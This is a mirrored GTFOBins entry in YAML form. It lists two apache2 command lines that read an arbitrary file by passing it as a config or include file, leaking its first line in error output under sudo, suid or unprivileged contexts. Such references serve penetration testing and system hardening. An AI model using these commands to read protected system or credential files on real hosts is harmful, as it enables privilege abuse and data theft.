mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
23 lines
467 B
Plaintext
23 lines
467 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
apache2 -f /path/to/input-file
|
|
comment: |-
|
|
The first line may be leaked as an error message.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
- binary: false
|
|
code: |-
|
|
apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'
|
|
comment: |-
|
|
The first line may be leaked as an error message.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
...
|